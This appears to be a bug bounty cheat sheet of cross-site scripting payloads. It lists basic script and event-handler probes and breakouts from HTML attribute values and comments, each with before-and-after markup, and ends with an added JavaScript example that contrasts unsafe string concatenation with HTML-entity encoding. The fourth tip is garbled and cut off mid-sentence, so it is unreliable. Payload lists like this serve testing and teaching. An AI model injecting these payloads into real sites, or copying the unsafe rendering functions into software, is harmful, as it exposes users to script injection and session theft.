AllAboutBugBounty/XSS.md
Muhammad Daffa 74b4c4b2eb
XSS [4]
Add 3 tips
2020-09-14 10:38:20 +07:00

XSS Payloads

  1. Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
  2. Add ' or " to break the payload out of the value of an HTML attribute
"><script>alert(1)</script>
'><script>alert(1)</script>
  • Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
  • After the payload is injected
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>">
  3. Add --> to escape the payload if the input lands in an HTML comment
--><script>alert(1)</script>
  • Example source code
<!-- REFLECTED_HERE -->
  • After the payload is injected
<!-- --><script>alert(1)</script> -->
  4. Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside
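
The attribute-value and HTML-comment reflections shown above, each next to a version that encodes the input before output. This is an added example, not part of the original repository; the function names are hypothetical and the payloads are the ones listed above.

```javascript
// Added example. Function names are hypothetical; payloads are the page's own.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the five characters that can end a quoted attribute value or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Attribute context, before: raw concatenation lets " close the value.
function renderInputUnsafe(q) {
  return '<input id="keyword" type="text" name="q" value="' + q + '">';
}

// Attribute context, after: the value is encoded, so it stays inside the quotes.
function renderInputSafe(q) {
  return '<input id="keyword" type="text" name="q" value="' + escapeHtml(q) + '">';
}

// Comment context, before: --> in the input closes the comment early.
function renderCommentUnsafe(text) {
  return "<!-- " + text + " -->";
}

// Comment context, after: every comment terminator needs a literal >, so
// encoding it keeps the input inside the comment. Leaving untrusted input
// out of comments altogether is the simpler fix.
function renderCommentSafe(text) {
  return "<!-- " + escapeHtml(text) + " -->";
}

// True if the markup contains an unencoded <script sequence.
function hasRawScriptTag(html) {
  return /<script\b/i.test(html);
}

const attrPayload = '"><script>alert(1)</script>';
const commentPayload = "--><script>alert(1)</script>";

// Each line prints: unsafe result, safe result.
console.log(hasRawScriptTag(renderInputUnsafe(attrPayload)), hasRawScriptTag(renderInputSafe(attrPayload)));
console.log(hasRawScriptTag(renderCommentUnsafe(commentPayload)), hasRawScriptTag(renderCommentSafe(commentPayload)));
```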